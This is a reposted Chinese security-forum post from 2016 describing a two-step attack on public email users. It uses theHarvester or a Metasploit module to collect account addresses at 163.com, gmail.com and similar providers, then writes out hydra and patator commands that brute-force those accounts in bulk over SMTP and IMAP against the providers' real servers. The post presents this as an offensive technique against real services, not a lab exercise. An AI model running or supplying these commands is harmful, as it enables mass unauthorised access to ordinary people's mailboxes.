新技术论坛
搜索
查看: 1065|回复: 0
打印 上一主题 下一主题

[渗透实战] (转载)Theharvester+Hydra批量扫弱口令账户

[复制链接]
  • TA的每日心情
    郁闷
    2016-4-15 18:50
  • 签到天数: 19 天

    连续签到: 1 天

    [LV.4]偶尔看看III

    扫一扫,手机访问本帖
    楼主
    跳转到指定楼层
    发表于 2016-4-6 18:26:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    theHarvester是一个社会工程学工具,它通过搜索引擎、PGP服务器以及SHODAN数据库收集用户的email,子域名,主机,雇员名,开放端口和banner信息;

    例如以下为扫描baidu.com的简单信息:

    但是这里我们即将使用的是利用theHarvester的扫描在线账户的功能,例如邮箱帐号;简单用法:
    $ theHarvester -d 163.com -l 1000 -b google
           -d 后跟服务器域名    163.com  hotmail.com  gmail.com  126.com  qq.com ... ...
          -l  限制显示数目      
          -b  调用搜索引擎(google,bing,bingapi,pgp,linkedin,google-profiles,people123,jigsaw,all)
             这样扫描的是以163.com为域名的所有服务器的管理员帐号和所有目前在线的帐号,所以每隔 一段时间扫描的结果是不一样的,除了网站管理员帐号不变外;别忘了google.com是要挂vpn才能访问的!

    或者也可以使用metasploit的 auxiliary/gather/search_email_collector 模块:



    然后把扫描结果保存为txt,使用在线密码破解软件就可以批量暴力破解了;例如:


      hydra -S -L file/gmail.com.txt -P file/password.txt -e ns -V -s 465 smtp.gmail.com smtp
      hydra -L file/163.com.txt -P file/password.txt -e ns -V -t 40 imap.163.com imap
      patator imap_login host=imap.163.com user=FILE0 password=FILE1 0=file/163.com.txt 1=file/passwords.txt
    。。。 。。。
    因为每隔一段时间扫描到的账户一般是不同的,所以这个账户文档可以越来越丰富。。。

    想法是丰满的,现实是骨感的;貌似现在遇到了点困难:








    高级模式
    B Color Image Link Quote Code Smilies

    本版积分规则

    手机版|Archiver|开发者俱乐部 ( ICP/ISP证:辽B-2-4-20110106号 IDC证:辽B-1-2-20070003号 )

    GMT+8, 2025-1-10 09:59 , Processed in 0.103848 second(s), 19 queries .

    X+ Open Developer Network (xodn.com)

    © 2009-2017 沈阳讯网网络科技有限公司

    快速回复 返回顶部 返回列表